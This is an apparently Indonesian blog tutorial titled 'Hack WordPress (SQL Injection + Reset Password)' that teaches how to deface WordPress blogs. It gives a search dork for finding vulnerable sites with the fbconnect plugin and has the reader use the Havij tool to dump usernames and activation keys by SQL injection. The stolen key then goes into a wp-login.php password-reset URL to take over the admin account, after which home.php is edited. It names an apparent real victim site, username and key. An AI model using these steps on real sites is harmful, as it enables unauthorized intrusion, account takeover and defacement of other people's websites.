Hack WordPress (SQL Injection + Reset Password)

Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai🙂
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..

        Kompie terhubung internet
        Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
        dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
    Kesabaran dalam mencari target
    Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe

saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14

kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key

heheh…dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu

    wp-login.php?action=rp&key=“kode aktivasi ”&login=“user login”

jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico

Sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita

Cukup ngedit home.php nya aja dah,hehehe

Dan berikut ini HASILNYA :))